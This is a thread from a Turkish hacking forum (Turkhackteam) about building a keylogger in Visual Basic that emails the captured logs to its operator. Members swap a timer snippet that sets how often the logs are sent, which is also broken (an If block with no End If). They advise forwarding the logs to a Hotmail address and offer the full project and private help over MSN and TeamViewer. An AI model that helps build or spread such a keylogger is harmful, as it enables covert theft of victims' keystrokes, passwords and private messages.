Mailli KeyLogger Yapımı // ÇALIŞIYOR.KODLAR ALINTI ANLATIM BENDEN.

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

MrT-R4P

Üye
30 Ocak 2008
192
0
Teşekkürer Agemon.Bende öğreniyim işe yarar.
abi bana dun bi windows live messenger msj geldi maillerinizi tek adrese gonderilsin diye bende inceledim gmail msjlarım loglar msn e-postasına gelıyor...

Ben onu mail yönlendirme diye biliyorum ama benim bildiğim kadarıyla mail yönlendirme ücrete tabii.Ama bilemeyeceğim.Onuda merak etmedim değil.

Agemon

Özel Üye
22 Ocak 2010
6,476
1
abi bana dun bi windows live messenger msj geldi maillerinizi tek adrese gonderilsin diye bende inceledim gmail msjlarım loglar msn e-postasına gelıyor...

adresini yönlendirmişsin iyi olmuş aslında bu sayede logları hotmail adreslerine yönlendirebiliyoruz.. ücretli değil kardeşim merak etme hotmail servisinin yeni hizmeti bu bence yönlendirmeniz sizin açınızdan daha kolay olur gibi geliyo 2 adresle uğraşmazsınız

Son düzenleme:

Agemon

Özel Üye
22 Ocak 2010
6,476
1
crazy3131 kardeşim Timer4 sorununu nasıl çözdünüz burdan da söyleyinde aynı hatayı alanlar faydalanabilsin.

Agemon

Özel Üye
22 Ocak 2010
6,476
1
PHP:
Private Sub Form_Load()
Label1.Caption = "0"
Label1.Visible = False
Timer3.Interval = 60000
End Sub

Private Sub Timer3_Timer()
If Label1.Caption = 1800 Then ' kaç dk istiyorsak 60 ile çarpıyoruz.30dk da bi gelsin diyorsanız 60X30=1800 ,oraya sonucu yazıyoruz.Ben 180 kullandım.
Else:
Label1.Caption = Label1.Caption + 1
End Sub

bu kodlar Timer3'e mi o zaman..

MrT-R4P

Üye
30 Ocak 2008
192
0
Arkadaşlar timer4 yok.Kodlara bakarsanız timer 3 yazıyor.Bi süre ben yokum crazy31 e gösterdim o olabiliyorsa yardımcı olsun yoksa gece girmeye çalışırım.İyi akşamlar.

deenedim calısıyo ama bi sorun war süre koymussun 30dk bir at fln onu ayarlıda timer 3den 2 olunca
hata veriyo
If Label1.Caption = 1800 Then ' kaç dk istiyorsak 60 ile çarpıyoruz.30dk da bi gelsin diyorsanız 60X30=1800 ,oraya sonucu yazıyoruz.Ben 180 kullandım.
Else:
End Sub

bu warya bide mail yollama koyunca gidiyo msn özelden söylip yardımcı olursan cok ty.

MrT-R4P

Üye
30 Ocak 2008
192
0
deenedim calısıyo ama bi sorun war süre koymussun 30dk bir at fln onu ayarlıda timer 3den 2 olunca
hata veriyo
Else:
End Sub

bu warya bide mail yollama koyunca gidiyo msn özelden söylip yardımcı olursan cok ty.

Dostum özelden msn adresini pm at hemen yardımcı olayım
Başka yapamayan arkadaş varsa proje paylaştım,
illa öğrencem diyorsanız pm den msn adresinizi bana yollayın teamviewer ile anlatırım.

Son düzenleme:
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.